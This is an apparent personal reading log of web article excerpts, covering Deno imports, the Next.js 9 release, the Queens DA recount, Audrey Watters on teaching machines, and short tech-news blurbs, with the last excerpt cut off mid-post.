The second option is to create an imports map, which we specify in a JSON file: { "imports": { "http/": "https://deno.land/std/http/" } } And then import it as such: import { serve } from "http/server.ts"; In order for it to work, we have to tell Deno about the imports map by including the --importmap flag: deno run --importmap=import_map.json hello_server.ts What about package versioning? 
Versioning has to be supported by the package provider, but from the client side it comes down to just setting the version number in the URL like so: https://unpkg.com/liltest@0.0.5/dist/liltest.js. Browser compatibility Deno aims to be browser-compatible. Technically speaking, when using the ES modules, we don’t have to use any build tools like webpack to make our application ready to use in a browser. However, tools like Babel will transpile the code to the ES5 version of JavaScript, and as a result, the code can be run even in older browsers that don’t support all the newest features of the language. But that also comes at the price of including a lot of unnecessary code and bloating the output file. It is up to us to decide what our main goal is and choose accordingly. TypeScript support out of the box Deno makes it easy to use TypeScript without the need for any config files. Still, it is possible to write programs in plain JavaScript and execute them with Deno without any trouble. Summary Deno, the new runtime for TypeScript and JavaScript, is an interesting project that has been steadily growing for quite some time now. But it still has a long way to go before it’s considered production-ready. With its decentralized approach, it takes the necessary step of freeing the JavaScript ecosystem from the centralized package registry that is npm. Dahl says that he expects to release version 1.0 by the end of the summer, so if you are interested in Deno’s future developments, star its repository. 
Source: What’s Deno, and how is it different from Node.js? – LogRocket Blog

    Read at 03:07 pm, Jul 11th

  • Blog - Next.js 9 | Next.js

After 70 canary releases we are pleased to introduce Next.js 9, featuring built-in TypeScript support, file-system dynamic routing, automatic static optimization, and API routes. As always, we have strived to ensure all these benefits are backwards compatible. For most Next.js applications, all you need to do is run: npm i next@latest react@latest react-dom@latest There are very few cases where your codebase might require changes. See the upgrade guide for more information. Since our last release, we’re happy to have seen companies like IGN, Bang & Olufsen, Intercom, Buffer, and Ferrari launch with Next.js. Check out the showcase for more! One year ago Next.js 6 introduced basic TypeScript support through a plugin called @zeit/next-typescript. Users also had to customize their .babelrc and enable it in next.config.js. When configured, the plugin would allow .ts and .tsx files to be built by Next.js. However, it did not integrate type-checking, nor were types provided by Next.js core. This meant a community package had to be maintained separately in DefinitelyTyped that could be out of sync with releases. While talking with many users, existing and new, it became clear that most were very interested in using TypeScript. They wanted a more reliable and standard solution for easily integrating TypeScript into their existing or new codebase. For that reason, we set out to integrate TypeScript support into the Next.js core, improving developer experience, and making it faster in the process. Automated Setup Getting started with TypeScript in Next.js is easy: rename any file, page or component, from .js to .tsx. Then, run next dev! This will cause Next.js to detect TypeScript is being used in your project. The Next.js CLI will guide you through installing the necessary types for React and Node.js. Next.js will also create a default tsconfig.json with sensible defaults if not already present. This file allows for integrated type-checking in editors like Visual Studio Code. 
Integrated Type-Checking Next.js handles type-checking for you in both development and building for production. While in development Next.js will show you type errors after saving a file. Type-checking happens in the background, allowing you to interact with your updated application in the browser instantly. Type errors will propagate to the browser as they become available. Next.js will also automatically fail the production build (i.e. next build) if type errors are present. This helps prevent shipping broken code to production. Next.js Core Written in TypeScript Over the past few months we’ve migrated most of the codebase to TypeScript. This has not only reinforced our code quality; it also allows us to provide types for all core modules. For example, when you import next/link, editors that support TypeScript will show the allowed properties and which values they accept. Dynamic routing (also known as URL Slugs or Pretty/Clean URLs) was one of the first feature requests on GitHub after Next.js was released 2.5 years ago! The issue was “solved” in Next.js 2.0 by introducing the custom server API for using Next.js programmatically. This allowed using Next.js as a rendering engine, enabling abstractions and mapping of incoming URLs to render certain pages. We spoke with users and examined many of their applications, finding that many of them had a custom server. A pattern emerged: the most prominent reason for the custom server was dynamic routing. However, a custom server comes with its own pitfalls: routing is handled at the server level instead of the proxy, it is deployed and scaled as a monolith, and it is prone to performance issues. Since a custom server requires the entire application to be available in one instance, it is typically difficult to deploy to a Serverless environment that solves these issues. Serverless requests are routed at the proxy layer and are scaled/executed independently to avoid performance bottlenecks. 
Additionally, we believe we can offer a better Developer Experience! Much of Next.js' magic starts when you create a file named pages/blog.js and suddenly have a page accessible at /blog. Why should a user need to create their own server and learn about Next.js' programmatic API to support a route like /blog/my-first-post (/blog/:id)? Based on this feedback and vision, we started investigating route mapping solutions, driven by what users already knew: the pages/ directory. Creating a Dynamically Routed Page Next.js supports creating routes with basic named parameters, a pattern popularized by path-to-regexp (the library that powers Express). Creating a page that matches the route /post/:pid can now be achieved by creating a file in your pages directory named: pages/post/[pid].js! Next.js will automatically match requests like /post/1, /post/hello-nextjs, etc and render the page defined in pages/post/[pid].js. The matching URL segment will be passed as a query parameter to your page with the name specified between the [square-brackets]. For example: given the following page and the request /post/hello-nextjs, the query object will be { pid: 'hello-nextjs' }: static async getInitialProps({ query }) { // pid = 'hello-nextjs' const { pid } = query const postContent = await fetch( `https://api.example.com/post/${encodeURIComponent(pid)}` ).then(r => r.text()) return { postContent } } Multiple dynamic URL segments are also supported! The [param] syntax is supported for directory names and file names, meaning the following examples work: ./pages/blog/[blogId]/comments/[commentId].js ./pages/posts/[pid]/index.js You can read more about this feature in the Next.js Documentation or Next.js Learn section. Next.js added support for static website generation in v3, released approximately two years ago. At the time, this was the most requested feature to be added to Next.js. And for good reason: there's no denying that static websites are fast! 
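The bracket-syntax matching described above can be approximated in a few lines. This is a hypothetical sketch for illustration only, not Next.js internals; the `matchRoute` helper and its behavior are assumptions:

```javascript
// Hypothetical sketch (not Next.js source): matching a file path like
// pages/post/[pid].js against an incoming URL to build the query object.
function matchRoute(filePath, url) {
  // 'pages/post/[pid].js' -> ['post', '[pid]']
  const routeSegments = filePath
    .replace(/^pages\//, '')
    .replace(/\.js$/, '')
    .split('/');
  // '/post/hello-nextjs' -> ['post', 'hello-nextjs']
  const urlSegments = url.replace(/^\//, '').split('/');
  if (routeSegments.length !== urlSegments.length) return null;

  const query = {};
  for (let i = 0; i < routeSegments.length; i++) {
    const seg = routeSegments[i];
    const dynamic = seg.match(/^\[(.+)\]$/);
    if (dynamic) {
      query[dynamic[1]] = urlSegments[i]; // [pid] captures the URL segment
    } else if (seg !== urlSegments[i]) {
      return null; // literal segment mismatch
    }
  }
  return query;
}

console.log(matchRoute('pages/post/[pid].js', '/post/hello-nextjs'));
// { pid: 'hello-nextjs' }
```

The same segment-by-segment walk extends naturally to multiple dynamic segments like ./pages/blog/[blogId]/comments/[commentId].js.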
They require no server-side computation and can be instantly streamed to the end-user from CDN locations. However, the choice between a server-side rendered or statically generated application was binary: you either chose server-side rendering or static generation. There was no middle ground. In reality, applications can have different requirements that call for different rendering strategies and trade-offs. For example, a homepage and marketing pages typically contain static content and are great candidates for static optimization. On the other hand, a product dashboard may benefit from server-side rendering, where the data updates frequently. We started exploring how we could give users the best of both worlds and be fast by default. How could we give users static marketing pages and dynamic server-rendered pages? Beginning with Next.js 9, users no longer have to make the choice between fully server-rendering or statically exporting their application, giving you the best of both worlds on a per-page basis. A heuristic was introduced to automatically determine if a page can be prerendered to static HTML. This determination is made by whether or not the page has blocking data requirements through using getInitialProps. This heuristic allows Next.js to emit hybrid applications that contain both server-rendered and statically generated pages. The built-in Next.js server (next start) and programmatic API (app.getRequestHandler()) both support this build output transparently. There is no configuration or special handling required. Statically generated pages are still reactive: Next.js will hydrate your application client-side to give it full interactivity. Furthermore, Next.js will update your application after hydration if the page relies on query parameters in the URL. Next.js will visually inform you if a page will be statically generated during development. This visual artifact can be hidden by clicking it. 
Statically generated pages will also be displayed in Next.js' build output: In many cases when building React applications you end up needing some kind of backend, either to retrieve data from a database or to process data provided by your users (e.g. a contact form). We found that many users who needed a backend built their API using a custom server. In doing so, they ran into quite a few issues. For example, Next.js does not compile custom server code, meaning that you couldn't use import / export or TypeScript. For this reason, many users ended up implementing their own custom compilation pipeline on top of the custom server. While this achieved their goal, it was prone to many pitfalls: for example, when configured incorrectly, tree shaking would be disabled for their entire application. This raised the question: what if we bring the developer experience Next.js provides to building API backends? Today we’re excited to introduce API routes, the best-in-class developer experience from Next.js for building your backend. To start using API routes you create a directory called api/ inside the pages/ directory. Any file in this directory will be automatically mapped to /api/<your route>, in the same way that other page files are mapped to routes. For example, pages/api/contact.js will be mapped to /api/contact. Note: API Routes also support Dynamic Routes! All the files inside the pages/api/ directory export a request handler function instead of a React Component: export default function handle(req, res) { res.end('Hello World') } Generally API endpoints take in some incoming data, for example the querystring, request body, or cookies and respond with other data. When investigating adding API routes support to Next.js we noticed that in many cases users didn’t use the Node.js request and response objects directly. Instead, they used an abstraction provided by server libraries like Express. 
The reason for doing this is that in many cases the incoming data is some form of text that has to be parsed first to be useful. So these specific server libraries help remove the burden of manually parsing the data, most commonly through middlewares. The most commonly used ones provide querystring, body, and cookies parsing, however they still require some setup to get started. API routes in Next.js will provide these middlewares by default so that you can be productive creating API endpoints immediately: export default function handle(req, res) { console.log(req.body) // The request body console.log(req.query) // The url querystring console.log(req.cookies) // The passed cookies res.end('Hello World') } Besides using incoming data your API endpoint generally also returns data. Commonly this response will be JSON. Next.js provides res.json() by default to make sending data easier: export default function handle(req, res) { res.json({ title: 'Hello World' }) } When making changes to API endpoints in development the code is automatically reloaded, so there is no need to restart the server. Next.js 9 will automatically prefetch <Link> components as they appear in-viewport. This feature improves the responsiveness of your application by making navigations to new pages quicker. Next.js uses an Intersection Observer to prefetch the assets necessary in the background. These requests have low-priority and yield to fetch() or XHR requests. Next.js will avoid automatically prefetching if the user has data-saver enabled. You can opt-out of this feature for rarely visited pages by setting the prefetch property to false: <Link href="/terms" prefetch={false}> <a>Terms of Service</a> </Link> Next.js 9 now renders optimized AMP by default for AMP-first and hybrid AMP pages. While AMP pages are opt-in, Next.js will automatically optimize their output. These optimizations can result in up to 50% faster rendering speed! 
This change was made possible by Sebastian Benz's incredible work on the AMP Optimizer. Next.js 9 replaces typeof window with its appropriate value (undefined or object) during server and client builds. This change allows Next.js to remove dead code from your production built application automatically. Users should see their client-side bundle sizes decrease if they have server-only code in getInitialProps or other parts of their application. In versions before 9, the only way to know that hot code replacement was going to happen (and that the Next.js compiler toolchain is doing work) is to look at the developer console. However many times one is looking at the resulting rendering instead, making it hard to know if Next.js is still doing compilation work or not. For example you might be making changes to styles on the page that are subtle and you wouldn't immediately know if they were updated. For this reason we created a RFC / "good first issue" to discuss potential solutions for the problem of indicating that work is being done. We received feedback from many designers and engineers on the RFC, for example what they prefer and potential directions for the design of the indicator. Rafael Almeida took this opportunity to collaborate with our team and implement a brand new indicator that is now available by default in Next.js 9. Whenever Next.js is doing compilation work you will see a small triangle show up in the bottom right corner of the page! Traditionally when making changes in development Next.js would show a compiling indicator state with loading state bars filling up and would continuously clear the screen as you made changes. This behavior causes some issues. Most notably it would clear console output from both your application code, for example when you add console.log to your components. But also when using external tools that stitch log output together like the Now CLI or docker-compose. 
Starting from Next.js 9 the log output jumps less and no longer clears the screen. This allows for a better overall experience, as your terminal window will have more relevant information and flicker less, while Next.js will integrate better with tools that you might already be using. Special thanks to Justin Chase for collaborating on output clearing. Building your application for production using next build will now give you a detailed view of all pages that were built. Every page receives a few statistics automatically. The most prominent one is bundle size. As your application grows, your JavaScript bundles will also grow; this build-time indication will help you track the growth of your production bundles. In the future you will also be able to set performance budgets for pages that will fail the production build. Besides bundle sizes we also show how many project components and node_modules components are being used in every page. This gives an indication of the page complexity. Every page also has an indication of whether it's statically optimized or server-side rendered, as every page can behave differently. Every page can now export a configuration object. Initially this configuration allows you to opt into AMP, but in the future you will be able to configure more page-specific options. // pages/about.js export const config = { amp: true } export default function AboutPage(props) { return <h3>My AMP About Page!</h3> } To opt into hybrid AMP rendering you can use the value 'hybrid': // pages/about.js import { useAmp } from 'next/amp' export const config = { amp: 'hybrid' } export default function AboutPage(props) { const isAmp = useAmp() return <h3>My About Page!{isAmp ? <> Powered by AMP!</> : ''}</h3> } The withAmp higher order component was removed in favor of this new configuration. We've provided a codemod that automatically converts usage of withAmp to the new configuration object. You can read more about this in the upgrade guide. 
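Pulling the API routes material above together: a minimal sketch of a handler exercised with hand-rolled mock req/res objects. The mocks are illustrative stand-ins only; in a real app Next.js supplies req and res with body, query, and cookie parsing already applied:

```javascript
// An API-route-style handler in the shape described above: it reads the
// pre-parsed pieces from req and responds with JSON via res.json().
function handle(req, res) {
  res.json({
    body: req.body,       // parsed request body
    query: req.query,     // parsed URL querystring
    cookies: req.cookies, // parsed cookies
  });
}

// Minimal mocks to exercise the handler outside a server (stand-ins for
// the objects Next.js would normally provide):
const req = {
  body: { name: 'Ada' },
  query: { page: '2' },
  cookies: { session: 'abc123' },
};
const res = {
  payload: null,
  json(data) {
    this.payload = data; // record what would be serialized to the client
  },
};

handle(req, res);
console.log(res.payload.body.name); // 'Ada'
```

Because the handler is just a function of (req, res), it is easy to unit-test this way without booting a server, which is part of the developer-experience appeal described in the post.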
We've recently made some changes to our tooling to provide a better experience while contributing to the codebase and ensure stability as the codebase grows. As you've read under the TypeScript section, the Next.js core is now written in TypeScript and types are automatically generated for Next.js applications to use. Besides being useful for applications built using Next.js, it's also useful when working on the core codebase, as you get type errors and autocompletion automatically. Next.js already had quite a large integration test suite that consists of 50+ Next.js applications with tests that run against them. These tests ensure that upgrading to a new release is smooth, because the features that were available before are tested against the same test suite. Most of our tests are integration tests because in many cases they replicate "real" developers using Next.js in development. For example, we have tests that replicate making changes to a Next.js application to see if hot module replacement works. Our integration tests are mostly based on Selenium webdriver, which we combined with chromedriver to test in headless Chrome. However, as time passed, certain issues would arise in other browsers, especially older browsers like Internet Explorer 11. Because we used Selenium, we were able to run our tests automatically on multiple browsers. As of right now we are running our test suite on Chrome, Firefox, Safari and Internet Explorer 11. The Google Chrome team has been working on improving Next.js by contributing RFCs and pull-requests. The goal of this collaboration is large-scale performance improvements, focused on bundle sizes, bootup and hydration time. For example, these changes will improve the experience of small websites, but also that of massive applications like Hulu, Twitch, and Deliveroo. The first area of focus is shipping modern JavaScript to browsers that support modern JavaScript. 
For example, Next.js currently has to provide polyfills and transpilation for async/await syntax, as the code might be executed in browsers that do not support async/await and would otherwise break. To avoid breaking older browsers while still sending modern JavaScript to browsers that support it, Next.js will utilize the module/nomodule pattern. The module/nomodule pattern provides a reliable mechanism for serving modern JavaScript to modern browsers while still allowing older browsers to fall back to polyfilled ES5. The RFC for module/nomodule in Next.js can be found here. The current bundle splitting strategy in Next.js is based around a ratio-based heuristic for including modules in a single "commons" chunk. Because there is very little granularity as there is only one bundle, code is either downloaded unnecessarily (because the commons chunk could include code that's not actually required for a particular route) or the code is duplicated across multiple page bundles. The RFC for improved bundle splitting can be found here. The Chrome team is also working on many other optimizations and changes that will improve Next.js. RFCs for these will be shared soon. These RFCs and pull-requests are labeled "Collaboration" so that they can be easily found in the Next.js issue tracker. We're excited to see the continued growth of the Next.js community. This release had over 65 pull-request authors contributing core improvements or examples. Speaking of examples, we now provide over 200 examples on how to integrate Next.js with different libraries and technologies! Including most css-in-js and data-fetching libraries. The Next.js community on spectrum.chat/next-js has doubled since the last major release with over 8,600 members. Join us! We are thankful to our community and all the external feedback and contributions that helped shape this release. Source: Blog – Next.js 9 | Next.js

    Read at 02:49 pm, Jul 11th

  • The Truth About the Queens DA Recount | The Nation

The Truth About the Queens DA Recount While leftists in Queens have come very far in a year, they still haven’t seized every rein of power. Tiffany Caban, right, listens as Melinda Katz speaks during a Queens District Attorney candidates' forum. (AP Photo / Mary Altaffer, File) On Tuesday afternoon, a newly emboldened Gregory Meeks stood outside the Queens Board of Elections, a coterie of politicians, activists and hangers-on flanking him. He was there to rail against Tiffany Cabán’s campaign, to accuse her backers of trafficking in Trumpian falsehoods. “I personally feel like a lot of the people making that noise, they don’t come from Queens — these folks do,” Meeks said, gesturing to the crowd behind him. Much is on the line for Meeks, a veteran congressman and recently anointed leader of the Queens Democratic Party, the same organization once dominated by Joe Crowley, Alexandria Ocasio-Cortez’s original nemesis. On June 25th, Cabán, a leftist insurgent who was virtually unknown just a few months ago, appeared to be on the verge of defeating Meeks’ pick to lead the Queens District Attorney’s office, Melinda Katz. Home to one of the largest DA’s offices in the nation, Queens had been the focus of unusual national attention since Ocasio-Cortez, Bernie Sanders, and Elizabeth Warren all backed Cabán, a 31-year-old public defender running on a platform to radically reshape criminal justice in New York City. She declared victory, up by more than 1,000 votes with about 91,000 cast. Katz, the Queens borough president and unquestioned front-runner, refused to concede, waiting for the so-called paper ballots—affidavits and absentee ballots—to be tallied a week later. None of this was out of the ordinary: candidates leading by such a margin usually declare victory, while those trailing by less than 1 percent will wait before issuing a formal concession. 
What happened next was remarkable. Katz crushed Cabán among absentee voters to the point where she now leads by 16 votes. Among veteran watchers of New York politics, the disappearance of the deficit was startling, because the results from the absentee pool rarely differ so dramatically from those of Election Day voters. In the seven-way contest (one candidate dropped out before election day but remained on the ballot), Katz won about 56 percent of absentees, compared to Cabán’s paltry 22 percent. Rather than indicating some sort of Queens machine chicanery, that outcome suggested Katz, a veteran of many campaigns, targeted the sort of voters—senior citizens in particular—who regularly vote without going to the polls. With the margin so close, an automatic recount has been triggered. It will begin next week. (Katz, oddly enough, has declared victory, even though the slim margin requires a recount.) No recount on this scale in New York City has ever been attempted. It is expected to take several weeks, as teams at the Queens Board of Elections—both registered Democrats and Republicans, all with ties to the local political parties—manually count the votes from the paper ballots that were cast into machines. Votes that the machine didn’t read because the bubble wasn’t filled in properly could still be counted, because poll workers will scrutinize the intention of the voter: whether they used a checkmark, an X, or didn’t fill in the bubble darkly enough. The recount is open to the public and will be observed by attorneys from both campaigns. The Katz and Cabán campaigns each have arguments for why the recount will favor them. “It’s a coin toss,” said Benjamin Rosenblatt, the president of Tidal Wave Strategies, a Queens-based consulting firm that has extensively analyzed the results of the DA’s race. “Usually, people who don’t fill out ballots correctly, sometimes they can be older voters. 
On the other hand, they could be first time voters, younger voters, people who never filled out a ballot before.” Due to New York’s archaic election laws, voters regularly show up at the polls unsure whether they are eligible to cast a ballot. Affidavits or provisional ballots are then assigned. The BOE typically ends up throwing many of these out, because the voters, for a variety of reasons, are not eligible for that particular election, whether it’s because they missed a deadline, joined the wrong party, or registered elsewhere. 
At issue now are 114 affidavits from registered Democrats in Queens who, for a number of reasons, may have filled out provisional ballots incorrectly. The Cabán campaign has fought hard for all these votes to be counted, citing case law that several election lawyers unaffiliated with the campaigns believe could hold in court. Their motive is also self-interested: affidavit voters, newer to elections or newer to the borough, could be Cabán voters. There is also relevant legislation that passed the State Assembly and Senate this year that would soften the standard for election officials to accept affidavit ballots. Carl Heastie, the Assembly speaker and a Katz supporter, has yet to send the bill to Governor Cuomo’s desk to sign into law. “Melinda Katz said on election night that every vote should be counted,” said Daniel Lumer, a Cabán spokesman. “We hope her campaign will join us in court to make sure that happens – and join our call on Governor Cuomo to quickly sign already-passed legislation that could prevent otherwise valid votes from being thrown out by technicalities.” “I believe the votes should count,” added Ali Najmi, a Democratic election lawyer unaffiliated with either campaign. “The poll worker has a duty to make sure voters are assisted in filling out affidavits correctly.” A hearing on the affidavits was scheduled for Tuesday in front of a Queens State Supreme Court judge who, like virtually all judges in the Queens civil division, was elevated with the explicit blessing of the Queens Democratic Party boss. The case was adjourned, however, and will now be heard by a Brooklyn Republican judge at a later date, once the recount is complete. Recounts can be extraordinarily expensive, and both the Katz and Cabán campaigns are running low on cash. 
In addition to a lawyer from the Democratic Socialists of America, a key early supporter, Cabán hired Jerry Goldfeder, a longtime Democratic election lawyer not known for working with hard-left candidates. The campaign has also added BerlinRosen, the powerhouse PR and consulting firm known for working with the very real estate developers Cabán and her allies repeatedly denounced. Katz doesn’t need to pay a lawyer. As the chosen candidate of the Queens Democratic Party, Katz has an attorney, Frank Bolz, who works free of charge. Bolz is part of a trio of Long Island-based lawyers—all allies of Crowley and his predecessor—who have effectively controlled the Queens County legal system for more than 30 years. This reality has fed grievances both legitimate and farcical. After affidavits were tossed, Shaun King, the criminal justice advocate and prominent social media personality, tweeted “LIES” and accused the BOE, without any actual evidence, of stealing the election for Katz. State Senator Alessandra Biaggi, a Bronx Democrat, appeared to accuse Katz and the local Democrats of also stealing the election. Nothing, so far, suggests any of this is true. Affidavit ballots are often discounted. The absentees weren’t forged. Democratic employees of the BOE, who do in fact owe their employment to party officials, have so far performed their jobs adequately. The recount commences without any foul play. These accusations have drawn a well of outrage from the Katz campaign. “The Cabán campaign’s persistent efforts to portray a rigged electoral system have triggered an avalanche of conspiracy theories and created a mob mentality,” said Matthew Rey, Katz’s campaign adviser. “The increasing recklessness of the Cabán campaign is deeply troubling for a candidate running for the borough’s top law enforcement job.” At the same time, the past incompetence of the city BOE—purging voters in Brooklyn, mismanaging machines—has bred understandable skepticism of the process. 
There are reasons to question the agency’s administration of elections. A nonpartisan BOE would assuage a lot of these concerns, but that won’t happen without action from Cuomo and the state legislature. Progressives rightfully skeptical of the Queens Democratic apparatus should also understand what they can and can’t do. The machine isn’t what it used to be—Katz turned out her votes through the help of organized labor and her own community ties, not the political clubs of yore. Political bosses can’t fix elections. Instead, they pick judges, stuff the BOE with allies, and allow friends to get rich in Surrogate’s Court. All of this matters tremendously. All of it creates appearances of impropriety. But it’s not the same as rigging a recount. Bolz, the aforementioned pro bono lawyer for Katz, is a reminder that while leftists in Queens have come very far in a year, they still haven’t seized every rein of power. Crowley’s defeat did not dislodge Bolz and his allies. Ocasio-Cortez, while taking on numerous national fights, has not attempted to party-build back home. Those who propelled Cabán and Ocasio-Cortez have much to celebrate. Politics in New York is in the midst of a profound realignment. Meanwhile, the ailing machine chugs on. Source: The Truth About the Queens DA Recount | The Nation

    Read at 01:31 pm, Jul 11th

  • Lingering Questions

Lingering Questions Audrey Watters on 06 Jul 2019 As I turn to editing, I do still have a few lingering research questions – questions that I figured I’d post here so I can have them top-of-mind while editing (and, of course, in case anyone out there can help me): What happened to the Center for Programed Instruction? When and why did it close? Why did Norman Crowder start working on programmed instruction? And what role did his employer, U.S. Industries, play in making sure his “alternative” to Skinner’s instructional technology was given such prominence in the media? What are the connections between cybernetics and teaching machines? Is there a good corporate or military case study with the use of teaching machines – one well-documented in archival materials? Say, Hughes Aircraft? (And how does this connect to the rest of the story I'm telling?) Are there letters (or other primary sources) that address the use of programmed instruction in Freedom Summer? (And if so, do I have time to take another research trip?) Source: Lingering Questions

    Read at 08:16 am, Jul 11th

  • The Teaching Machine Imaginary (And an Update on the Book)

The Teaching Machine Imaginary (And an Update on the Book) Audrey Watters on 05 Jul 2019 Cross-posted to the Teaching Machines website I submitted the draft of Teaching Machines to my editor at MIT Press at the end of May. I haven’t looked at the manuscript since, although I’ve been mulling over various parts and passages in my head almost nonstop. Over the course of the past few weeks, I’ve read a handful of books on writing and editing – Benjamin Dreyer’s Dreyer’s English, Stephen King’s On Writing, and Susan Bell’s The Artful Edit – but this week I turn my attention to revising the book. I’ve printed out all the pages and I’ll start making edits by hand – my preferred method. (It’s my preferred method of writing too but I do recognize that it is very, very slow. And so I type.) One of the realizations I’ve had recently, having chatted casually with various non-ed-tech professionals about the book – my eye doctor, for example, and my hair stylist – is that I need to have much richer descriptions of what the teaching machines actually look like and what they actually do. (Yes, yes, yes. This is obvious.) My elevator pitch for the book typically goes something like this: “It’s the story of the psychologists who, in the mid-twentieth century, built machines – not computers, before computers – that they claimed would automate and personalize education.” That verb “claimed” makes it sound like this was a promise unfulfilled. And to a certain extent, that’s true. Teaching machines never sat on every desk in every classroom in America. But their proponents would insist that, when and where these devices were used – and they were used at home, at school, by the military, by manufacturers – that they did indeed enable people to learn at their own pace without the need for human instructors. There is a gulf between what folks say education technology can do, of course, and what it actually does – as much today as in the 1950s and 1960s. 
And there’s a gulf too between what folks hear education technology can do, based on all the slogans and marketing, and what they imagine that actually means. “When you say ‘teaching machines from the 1960s’,” one person recently told me, “I picture the robot teacher in The Jetsons.” (I’m never sure if The Jetsons are meant to reflect “the future” as much as nostalgia for an invented future past – I’m inclined to think it’s always been the latter, even when the show first aired. It is, in many ways, incredibly reactionary.) The Jetsons did appear on primetime television during the peak of the teaching machine craze, but Mrs. Brainmocker, Elroy’s robot teacher (who is, I must presume by her title, a married robot teacher), appeared in just one episode – the last one of its 1960s incarnation – and only quite briefly at that. In “Elroy’s Mob,” a scene at the Little Dipper School opens with Elroy talking through a math problem written on the blackboard. His answer is gibberish: “…And eight trillion to the third power times the nuclear hypotenuse equals the total sum of the trigonomic syndrome divided by the supersonic equation.” “Now one second while I check over your answer,” Mrs. Brainmocker responds, rapidly clicking on the panel of buttons on her chest. “Boink!” A slip of paper emerges from the top of her (its?) head. “Absolutely correct, Elroy,” she reads. “You really know your elementary arithmetic.” As she begins to gush about what a pleasure it is to teach students like him, she starts to stutter. “I’ve got a short in one of my transistors,” she apologizes to the class. Mrs. Brainmocker was, of course, more sophisticated than the teaching machines that were peddled to schools and to families at the time. These machines couldn’t talk. They couldn’t roll around the classroom and hand out report cards. Nevertheless, Mrs. 
Brainmocker’s teaching – her functionality as a teaching machine, that is – is strikingly similar to the devices that were available to the public. Mrs. Brainmocker even looks a bit like Norman Crowder’s Autotutor, a machine released by U.S. Industries in 1960, which had a series of buttons on its front that the student would click on to input her answers and which dispensed a read-out from its top with her score. Teaching machines and robot teachers were part of the Sixties’ cultural imaginary. But that imaginary – certainly in the case of The Jetsons – was, upon close inspection, not always particularly radical or transformative. The students at Little Dipper Elementary still sit in desks in rows. The teacher still stands at the front of the class, disciplining students who aren’t paying attention. (In this episode, that’s school bully Kenny Countdown, who’s watching the one-millionth episode of The Flintstones on his TV watch.) There were other, more sweeping visions of the future of teaching machines in the late 1950s and early 1960s – Simon Ramo’s “A New Technique of Education,” for example, that featured pervasive surveillance, television-based instruction, and “push-button classes.” But it’s worth underscoring that often what gets touted excitedly as “the future of education” and what gets absorbed into the cultural imaginary about that future are very rarely all that different from the present. And once you look closely at the technologies in question and their associated practices in these futures, you’ll find that they’re very rarely that exciting. Digital worksheets and the like. Animated drill-and-kill. Proponents of teaching machines in the 1950s and 1960s were quite aware that some of the excitement for their inventions was bound up in the novelty. Students responded enthusiastically to the new devices – but would that last? (A familiar concern to this day.) 
In order to help write some prose about teaching machines, I recently bought one off of eBay – a Min/Max II manufactured by Teaching Machines Inc, along with a “programed” course on electricity. The Min/Max was larger than I’d imagined – even though I’d read pages and pages of descriptions of the machine and thought I knew what to expect: about 18 inches long and 10 inches across. It was bulky, but as it was made from plastic, not particularly heavy. Even so, I had a hard time using it on my lap and it took up a lot of space on my desk. The only mechanical part of the machine: dials on each side used to advance the paper-based programming materials with a roller mechanism similar to a typewriter’s. The lid lifts to insert those papers – a max of 100 sheets, the Min/Max cautions. The electricity course, for its part, contains 150 pieces of paper, printed on both sides, each side with about 5 “frames” of instructional content. I slid about half the papers into the machine, and spun the knob until the first few questions appeared in the clear plastic window at the top. The first few frames introduce the student to programmed instruction, explaining how to read the question, write the answer in the blank space given, then push the paper up until the answer can be checked. “The steps in this program are fixed so that you should be right most of the time,” the instructions explain. The course then gives a couple of sample questions that demonstrate. “If the answer to a question is a word to be filled in the blank, it is shown with a line like this ______. George Washington was the first ______ of the U.S.” The first electricity question: “All matter is made of molecules (say MAHL-e-kules). Wood is made of molecules. Water is made of ______.” (The answer: molecules.) The course moves painfully slowly from there. It isn’t until question 9 that we get to atoms, question 17 that we get to electrons. I was bored well before then. 
Even with the promise that I could “move at my own pace,” that pace was necessarily slowed by the drudgery of the small steps in each frame. And I still had 1436 frames to go. I want to be clear here: this drudgery isn’t simply a result of the teaching machine. It is tied to “programmed instruction,” to be sure. (That method of designing educational materials, and not the hardware, is one of the most important legacies of the teaching machine movement.) But it’s also simply (and sadly) part of the drudgery of schoolwork – drudgery that, as the children’s book Danny Dunn and the Homework Machine (1958) observed, was unlikely to be eliminated by computers. In fact, as Danny and his friends found out, students would just be expected to do more dull work more quickly. The challenge, I think, is to express to readers this drudgery not only in contrast to the fantasies of shiny and efficient teaching machines – stories about robot teachers or otherwise – but also as the same sort of drudgery that today’s ed-tech dictates. Calling it “personalized learning” doesn’t make today’s computer-based instruction any more exciting. I promise you. Source: The Teaching Machine Imaginary (And an Update on the Book)

    Read at 08:02 am, Jul 11th

Day of Jul 10th, 2019

  • China Is Forcing Tourists to Install Text-Stealing Malware at its Border

    Foreigners crossing certain Chinese borders into the Xinjiang region, where authorities are conducting a massive campaign of surveillance and oppression against the local Muslim population, are being forced to install a piece of malware on their phones that gives all of their text messages as well a

    Read at 09:42 am, Jul 10th

  • Corbyn’s Labour: Socialism Through Parliament or Parliamentary Socialism?

    Watching the polls in the UK at the beginning of this year, you might have seen something truly remarkable: that Jeremy Corbyn, a self-described socialist, someone towards whom those same polls — or really, pollsters — had been exceedingly cool, would, in the event of a general election, be elec

    Read at 09:31 am, Jul 10th

  • The npm Blog — An Old Bug

    Recently, I happened across a weird line in read-package-tree while reading through the code to see where I might get started implementing Workspaces for the npm CLI. At the time, I was so deep in the flow of reading code and tracing flows through various parts of the system, it didn’t strike me how important it was. I just thought “oh, that’s obviously wrong” and fixed it without a second thought. When I tried to integrate my changes back to the mainline CLI with read-package-tree version 5.3.0, however, I realized what I’d found. It might not seem weird at first, so I’ll provide some context. The read-package-tree module reads the tree of packages in a node_modules folder. It doesn’t do dependency resolution, or figure out how that tree needs to be modified during an install or update, but it does provide the basic data structure that is subsequently modified within the npm CLI installer codebase. Most importantly, it loads Node objects with parent and children links on them. Node.js’s module loader has a subtle and important property to it, which makes a lot of npm’s magic possible, and has made it such a good choice over the years as a way to create CLI utilities. When a module in Node calls require('foo'), Node looks up through the node_modules hierarchy to find the foo module. However, importantly, when a package is symlinked into another location, the module resolution process runs based on the target location, not the link location. This is why, for example, you can have a symlink from /usr/local/bin/npm that points to /usr/local/lib/node_modules/npm/bin/npm-cli.js, but the program doesn’t have to be updated to carry all its dependencies along with it. This is how you can have multiple different versions of a dependency loaded in the same Node program at the same time, providing a release valve on the dependency constraint solver and thus avoiding dependency hell. So back to this weird line. 
